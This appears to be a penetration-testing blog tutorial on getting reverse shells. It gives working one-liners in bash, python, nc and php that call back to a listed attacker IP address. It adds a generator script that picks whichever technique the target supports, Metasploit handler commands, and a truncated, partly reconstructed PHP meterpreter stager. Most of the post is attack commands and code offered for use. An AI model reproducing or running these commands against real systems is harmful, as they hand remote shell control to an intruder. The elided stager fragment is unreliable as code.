Contributors to this blog: HireHackking


In penetration testing, the most common way to get a shell is to have the target bounce one back to us over TCP (or UDP), that is, a reverse connection.

First, what forward and reverse connections are.

Forward connection: our machine connects to the target, e.g. ssh or mstsc (RDP)

Reverse connection: the target machine connects back to our machine

So why is the reverse connection more common?

The target is on a LAN behind NAT, so we cannot reach it directly

The target has a dynamic IP, so there is no stable address to connect to

The target has a firewall that blocks inbound connections but usually allows outbound ones, so a connection initiated from the inside gets through

Now the experimental environment:

Attacker machine: Kali Linux, 47.98.229.211

Target machine: CentOS 7, 149.129.68.117 (Alibaba Cloud server)

Technique one: bash (also the most common way)

Listen on Kali:

nc -lvvp 5555

Run on CentOS (the port must be the one the listener is bound to):

bash -i >& /dev/tcp/47.98.229.211/5555 0>&1

/dev/tcp/HOST/PORT is a bash feature, not a real device file, so this needs bash rather than sh; >& sends stdout and stderr into the socket and 0>&1 reads stdin from it. After the command runs, the shell is bounced back to the listener.

Technique two: python

Listen on Kali:

nc -lvvp 5555

Run on CentOS (the shell path was cut off in the original; /bin/sh is the usual choice, and use python3 on hosts that have no python binary):

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("47.98.229.211",5555));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

The three dup2 calls point the shell's stdin, stdout and stderr at the socket, so the interactive shell runs entirely over the connection.

Technique three: nc

If the target has nc and that build supports the -e option, nc itself can create the reverse shell.

Listen on Kali:

nc -lvvp 5555

Run on the target (shell path cut off in the original; /bin/sh assumed):

nc 47.98.229.211 5555 -t -e /bin/sh

This hands the target's /bin/sh to the attacker machine.

However, many Linux distributions ship a stripped-down nc (for example the OpenBSD variant) that has no -e. If the target has no nc, or its nc lacks -e, do not rely on this method.

Technique four: php

Listen on Kali:

nc -lvvp 4444

This requires php on the target; then run, pointing it at the listener's IP:

php -r '$sock=fsockopen("47.98.229.211",4444);exec("/bin/sh -i <&3 >&3 2>&3");'

fsockopen's socket lands on descriptor 3 because 0, 1 and 2 are already open in the php process, so the shell's stdin, stdout and stderr are redirected to fd 3. If the php process has other files open, the descriptor number differs and the redirections must be adjusted.
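The four one-liners above differ only in the interpreter they need and the listener address they dial, and the nc caveat is the one that bites most often. The script below is an added example, not code from the original post or its author: it prints the listener command and the one-liner for a chosen technique, and checks whether the local nc actually advertises an exec option before recommending it. LHOST and LPORT are parameters; the 10.0.0.5:5555 pair in the usage lines is an assumed address. It emits `python` as this page does; substitute `python3` where no `python` binary exists.

```shell
#!/usr/bin/env bash
# Added example, not code from the original post: generate the reverse-shell
# one-liners discussed above for a given listener and check which interpreter
# the current host can actually use. 10.0.0.5:5555 below is an assumed address.

# Print the attacker-side listener for LPORT (must match what the payload dials).
listener_cmd() {
    printf 'nc -lvvp %s\n' "$1"
}

# Print the target-side one-liner for TECH (bash|python|nc|php) dialing LHOST:LPORT.
# The redirections are the part most often mangled when copied from web pages:
#   bash: '>&' sends stdout+stderr into the socket, '0>&1' reads stdin from it
#   php:  fsockopen's socket is fd 3 (0-2 are taken), so the shell is wired to fd 3
reverse_shell_cmd() {
    local tech=$1 lhost=$2 lport=$3
    case "$tech" in
        bash)
            printf '%s\n' "bash -i >& /dev/tcp/$lhost/$lport 0>&1" ;;
        python)
            printf '%s\n' "python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"$lhost\",$lport));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call([\"/bin/sh\",\"-i\"])'" ;;
        nc)
            printf '%s\n' "nc $lhost $lport -e /bin/sh" ;;
        php)
            printf '%s\n' "php -r '\$sock=fsockopen(\"$lhost\",$lport);exec(\"/bin/sh -i <&3 >&3 2>&3\");'" ;;
        *)
            echo "unknown technique: $tech" >&2; return 2 ;;
    esac
}

# Read the output of `nc -h` on stdin; succeed only if an exec option is advertised.
# Match the word "exec" (GNU netcat: "-e, --exec=PROGRAM"; ncat: "-e, --exec";
# traditional nc: "-e prog  program to exec after connect") rather than "-e":
# the OpenBSD nc most distributions ship also has a "-e name" flag, but there it
# is the expected TLS peer name, not a program to run.
nc_usage_has_exec() {
    grep -qi 'exec'
}

# Does the nc installed here support -e? This inspects the binary on *this* host,
# so run it on the target, which is where the nc technique has to work.
nc_supports_exec() {
    command -v nc >/dev/null 2>&1 || return 1
    nc -h 2>&1 | nc_usage_has_exec
}

# Pick the first usable technique in the order the post presents them.
# Caveat: a bash built with --disable-net-redirections has no /dev/tcp, which
# this check cannot see; if the bash one-liner fails with "No such file or
# directory", fall through to the next technique.
pick_technique() {
    if command -v bash >/dev/null 2>&1; then echo bash
    elif command -v python >/dev/null 2>&1 || command -v python3 >/dev/null 2>&1; then echo python
    elif nc_supports_exec; then echo nc
    elif command -v php >/dev/null 2>&1; then echo php
    else echo none; return 1
    fi
}

# Usage: print what to run on each side for the assumed listener 10.0.0.5:5555.
lhost=10.0.0.5; lport=5555
echo "attacker: $(listener_cmd "$lport")"
tech=$(pick_technique) || tech=bash
echo "target ($tech): $(reverse_shell_cmd "$tech" "$lhost" "$lport")"
```

Run the script on the target to see which one-liner it can execute; the listener line is what to start on the attacker first, and the port in both lines is the same by construction, which is the mistake most often made when the two halves are copied from different cheat sheets.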

Some other advanced tricks

About the PHP payload

First do the basic handler configuration in msfconsole. The PHP stager below dials port 53, so LPORT must also be set to 53 (the handler defaults to 4444):

msf > use exploit/multi/handler
msf exploit(handler) > set payload php/meterpreter/reverse_tcp
payload => php/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.1.107
LHOST => 192.168.1.107

The PHP side is the php/meterpreter/reverse_tcp stager. The copy on this page is cut off; the gaps are marked with ... and the stripped && operators and the fsockopen typo have been repaired:

<?php
error_reporting(0);
$ip = 'x.x.x.x';   // LHOST
$port = 53;        // LPORT
if (($f = 'stream_socket_client') && is_callable($f)) {
    ... {$port}");
    $s_type = 'stream';
}
if (!$s && ($f = 'fsockopen') && is_callable($f)) {
    $s = $f($ip, $port);
    $s_...
}
...
            ... strlen($b)); break;
        case 'socket': $b .= socket_read($s, $len - strlen($b)); break;
    }
}
$GLOBALS['msgsock'] = $s;
$GLOBALS['msgsock_type'] = $s_type;
if (extension_loaded('s...

The stager tries stream_socket_client, then fsockopen, then the socket extension, reads a length-prefixed second stage from the handler into $b, and stores the socket in $GLOBALS['msgsock'] for that stage to reuse.